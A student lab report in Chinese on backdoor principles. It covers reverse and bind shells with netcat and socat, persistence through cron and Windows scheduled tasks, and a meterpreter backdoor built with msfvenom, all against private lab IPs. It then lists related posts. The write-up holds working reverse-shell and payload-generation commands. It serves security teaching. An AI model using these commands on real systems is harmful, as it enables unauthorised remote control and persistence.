20145209刘一阳《网络对抗》Exp2 后门原理与实践
20145209刘一阳《网络对抗》Exp2 后门原理与实践
基础问题回答
1.例举你能想到的一个后门进入到你系统中的可能方式? •在网上下载软件的时候,后门很有可能被捆绑在下载的软件当中;
•浏览网页的时候,点的一些小广告可能会被植入后门。
2.例举你知道的后门如何启动起来(win及linux)的方式? •Windows下在控制面板的管理工具中可以设置任务计划启动,或者通过修改注册表来达到自启的目的;
•对后门程序进行伪装,例如重命名成某个游戏的开始程序之类的,诱骗用户点击启动;
•Linux下可以通过cron来启动。
3.Meterpreter有哪些给你映像深刻的功能? •直接通过指令获取主机的摄像头有点6,有点像电影里的黑客;
•获取击键记录也能得到很多信息,比如登录什么网站的密码,或者说和某人的重要聊天记录之类的,都非常容易被人窃取到进行分析;
•导出密码文件功能简直是有点无解,这样一来你的电脑相当于是透明的;
•后门进程的迁移,这样即使有管理员去查看运行的进程也很难发现后门的存在;
•使用后渗透攻击模块POST可以对主机进行更深入的攻击。
4.如何发现自己有系统有没有被安装后门? •没有经过免杀处理的后门程序可能很容易就被杀毒工具扫出来,不过一般现在这样的后门也很少了;
•检查防火墙开启的端口和它对应的进程,如果不是系统默认开启的端口都有嫌疑,找到对应的进程,对其进行抓包分析;
•下载专门的监控软件,对操作系统中的进程进行监控,看是否存在异常。
常用后门工具实践
Windows获得Linux Shell
1.在Windows下,先使用ipconfig指令查看本机IP:
2.使用ncat.exe程序监听本机的5209端口:
3.在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5209端口:
4.Windows下成功获得了一个Kali的shell,运行ls指令如下:
Linux获得Windows Shell
1.过程与之前的类似,在Kali环境下用ifconfig查看IP:
2.使用nc指令监听5209端口:
3.在Windows下,使用ncat.exe程序的-e选项项反向连接Kali主机的5209端口:
4.Kali下可以看到Windows的命令提示,可以输入Windows命令:
使用nc传输数据
1.Windows下监听5209端口:
2.Kali下连接到Windows的5209端口:
3.建立连接之后,就可以传输数据了,这里传输的是字符串,相当于两台主机在聊天,也可以用重定向操作符来传输文件:
实验内容
使用netcat获取主机操作Shell,cron启动
1.先在Windows系统下,监听5209端口:
2.在Kali环境下,使用man crontab指令查看crontab命令的帮助文档,从文档中我们可以知道crontab指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab文件中,以供之后读取和执行。
3.用crontab -e指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器就行:
4.在最后一行添加55 * * * * /bin/netcat 192.168.1.197 5209 -e /bin/sh,意思是在每个小时的第37分钟反向连接Windows主机的5209端口,设置成55的原因是我当时的时间是,为了能立马看到效果,所以我将时间设置在了一分钟以后:
5.当时间到了时,此时已经获得了Kali的shell,可以输入指令(如果在这之前输入指令,屏幕上不会有显示,但是等到了55分时会立马显示出来):
使用socat获取主机操作Shell, 任务计划启动
基础知识
1.socat是ncat的增强版,它使用的格式是socat [options]
2.socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。
实践过程
1.在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
2.在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5209 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5209,同时把cmd.exe的stderr重定向到stdout上:
3.创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行:
4.此时,在Kali环境下输入指令socat - tcp:192.168.1.200:5209,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5209端口,此时可以发现已经成功获得了一个cmd shell:
使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
1.输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.129 LPORT=5209 -f exe > 20145209_backdoor.exe生成后门程序:
2.通过nc指令将生成的后门程序传送到Windows主机上:
3.在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:
4.设置完成后,执行监听:
5.打开Windows上的后门程序:
6.此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:
使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
转载于:https://www.cnblogs.com/liuyiyang/p/6583129.html
20145209刘一阳《网络对抗》Exp2 后门原理与实践相关推荐
- 20145318赵一《网络对抗》后门原理与实践
20145318赵一<网络对抗>后门原理与实践 知识点 后门 后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法. 在软件的开发阶段,程序员常常会在软件内创建后门程序以便 ...
- 2018-2019-2 网络对抗技术 20165301 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165301 Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任 ...
- 2019-2020-2 20175227张雪莹《网络对抗技术》 Exp2 后门原理与实践
2019-2020-2 20175227张雪莹<网络对抗技术> Exp2 后门原理与实践 目录 0. 基础知识 1. 实验内容 1.0 常用后门工具 1.1 使用netcat获取主机操作S ...
- 20155317王新玮《网络对抗》Exp2 后门原理与实践
20155317王新玮<网络对抗>Exp2 后门原理与实践 一.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划 ...
- 2017-2018-2 20155314《网络对抗技术》Exp2 后门原理与实践
2017-2018-2 20155314<网络对抗技术>Exp2 后门原理与实践 目录 实验要求 实验内容 实验环境 预备知识 1.后门概念 2.常用后门工具 实验步骤 1 用nc或net ...
- 2018-2019-2 20165212《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165212<网络对抗技术>Exp2 后门原理与实践 1.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作 ...
- 2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践 后门的基本概念及基础问题回答 常用后门工具 netcat Win获得Linux Shell Linux获得Win Sh ...
- Exp2 后门原理与实践 20204308李文艳
Exp2 后门原理与实践 20204308李文艳 1. 基础问题 1.1 例举你能想到的一个后门进入到你系统中的可能方式? 1.2 例举你知道的后门如何启动起来(win及linux)的方式? 1.3 ...
- 2018-2019 Exp2 后门原理与实践
2018-2019 Exp2 后门原理与实践 目录 一.实验内容说明及基础问题回答 二.工具准备 查看WindowsIP和LinuxIP Windows获得Linuxshell Linux 获得Win ...
最新文章
- 8. 进制转化的函数
- python中x,y=y,x的交换原理
- 2011.12.15 linux基本命令
- CentOS7安装Docker与使用篇
- 如何在搜狗浏览器更换页面字体?搜狗浏览器更换页面字体的方法
- 剖析SQL Server2005 SQLCLR代码安全性
- java虚拟机内存告警_java虚拟机内存溢出各种场景总结
- oracle 等待原因查找,查询引起锁等待的SQL语句
- 手机升降式摄像头有什么优缺点?
- 阶段5 3.微服务项目【学成在线】_day01 搭建环境 CMS服务端开发_02-项目概述-功能构架-功能模块和项目原型...
- Ubuntu 自动关机命令
- 笔记No.1——第一行代码:Android(第2版)
- MicrosoftStore无法下载软件
- 裁判文书网爬虫(2019.5.15更新)
- HDU3376 Matrix Again——最大费用最大流
- kali通过msf利用永恒之蓝攻击服务器
- React(四):Smart组件与Dumb组件
- 简单的nodejs+socket.io给指定的人发送消息
- 国外短链接项目。一万次点击220美刀
- 数据库SQL(五):Integrity Constraints(完整性约束)
热门文章
- 网易云轻舟微服务深度解读:基于开源,强于开源 1
- 怎样看待 12 个月内自学完成 4 年麻省理工学院计算机科学的 33 门课程的 Scott H. Young 所谓的超速学习理论和方法(费曼技巧)以及背后「Get More from Life」的理念
- 物通博联能源互联网解决方案
- python dlib opencv人脸识别准确度_Dlib+OpenCV深度学习人脸识别的方法示例
- 愿你三冬暖愿你春不寒--喜欢的诗
- CI/CD --- 什么才是真正的自动化平台
- greenplum查询超时_Greenplum常用SQL查询
- 远程运行pycharm的时候显示already running怎么办
- 网关、路由器、局域网、广域网
- c语言实现正倒金字塔